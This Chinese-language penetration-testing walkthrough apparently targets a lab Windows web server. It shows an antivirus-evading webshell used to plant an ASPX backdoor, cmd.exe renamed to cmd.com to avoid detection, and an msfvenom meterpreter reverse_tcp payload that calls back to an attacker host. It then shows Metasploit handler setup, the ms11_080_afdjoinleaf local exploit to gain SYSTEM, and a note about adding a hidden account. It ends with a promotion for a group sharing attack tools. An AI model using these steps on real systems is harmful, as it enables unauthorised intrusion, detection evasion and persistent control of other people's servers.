目标IP:192.168.106.130:82
攻击IP:192.168.106.1
原理:利用系统溢出漏洞提升
第一步:访问目标网站
第二步:假设已经成功将大马文件上传至目标网站,访问大马
输入后门密码,登录
第三步:执行系统命令ipconfig,如图所示
执行后显示拒绝访问,如图所示
用执行–CMD2测试结果,如图所示
第三步:不能执行cmd命令,我们就自己上传
首先查看一下目录权限,查看哪个目录可以上传文件
经查勘发现有几处文件夹是可读可写的权限,建议选择文件夹路径没有空格的进行上传,因为空格会造成影响,执行错误
选择C:\recycler\,上传cmd.exe
为了避免查杀软件查杀,将cmd.exe修改为cmd.com,上传提示,如下图所示
第四步:上传cmd.exe文件提示缺少对象,但我们不轻言放弃,思考aspx的权限比asp权限大,因此我们测试写文件,看能否写个aspx大马后门
选择新建文本,写上文件保存的绝对路径并命名为shell.asp,将ASPX大马文件代码复制到文本框中
点击保存
访问shell.aspx后门文件,后门文件为了免杀做的免杀处理,下滑后最下头输入密码
输入密码后,需要耐心等待一段时间,才会登录成功,登陆后如下图所示:
在网站根目录上传cms.com文件
上传成功后,如下图所示
进入asp木马文件,测试cmd命令是否可以执行,执行成功如下图所示
查看当前权限是network service网络服务权限,非常小的
第五步:提权
参考网址:www.jianshu.com/p/dee2b171a…
思路:利用msfvenom制作 .exe 文件,然后上传到靶机Windows上面,运行后就可以在kali linux 上面利用msfconsole连接msfvenom服务控制靶机
利用msfvenom制作exe文件
命令:# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.106.131 lport=1234 -f exe >shell.exe
解释:
-p:加载的payload
lhost:控制端IP
lport:控制端连接端口号1234
-f:生成的文件格式
“>shell.exe”:生成的文件名字以及位置,默认是当前目录所在位置
将生成的exe文件通过aspx大马上传到目标服务器
成功上传exe文件
注意:此时已成功上传
此时新打开一个cmd界面输入msfconsole
输入msf5 > use exploit/multi/handler 进入接受反弹shell的位置,设置payload,payload与之前生成shell.exe的payload要一样
set payload windows/meterpreter/reverse_tcp
设置payload的选项要与之前生成shell.exe一样
第六步:执行shell.exe,只有执行后才会反弹shell
反弹提示,如下图所示
输入background返回寻找提权的exp
进入exploit/windows/local中查看可以利用的提权exp比如ms开头的这些
比如ms10-015模块,show targets查看攻击目标操作系统类型是windows 2000 SP4到windows 7,包含win2003
查看您当前的session会话,发现已经成功返回一个会话
注意:输入sessions -i
选择漏洞提权利用模块
use exploit/windows/local/ms11_080_afdjoinleaf
set session 1
会话正常建立连接,接下来,getuid获取权限,获取system权限
输入shell返回windows cmd界面,之后就可以添加隐藏账户
更多web安全工具与存在漏洞的网站搭建源码,收集整理在知识星球。可私信我,邀请你免费进
